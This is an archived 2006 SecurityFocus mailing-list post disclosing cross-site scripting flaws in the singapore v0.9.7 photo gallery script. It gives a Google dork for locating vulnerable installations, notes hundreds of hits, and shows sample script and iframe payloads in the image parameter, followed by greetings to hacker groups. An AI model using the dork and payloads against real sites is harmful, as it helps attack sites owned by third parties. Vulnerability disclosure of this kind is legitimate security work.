singapore v0.9.7 XSS Vulnerabilities May 08 2006 07:25AM
alp_eren ayyildiz org


singapore v0.9.7



The system is vulnerable to various XSS attacks

google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery

429 results :)

xss code example

================[gallery name]&image=<iframe%20src="">[gallery name]&image=<script>alert("lol")<script>

mail: alp_eren[at]ayyildiz[dot]com

web :

greets to thehacker,iskorpitx,suskun,shadow, and all AYT member

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus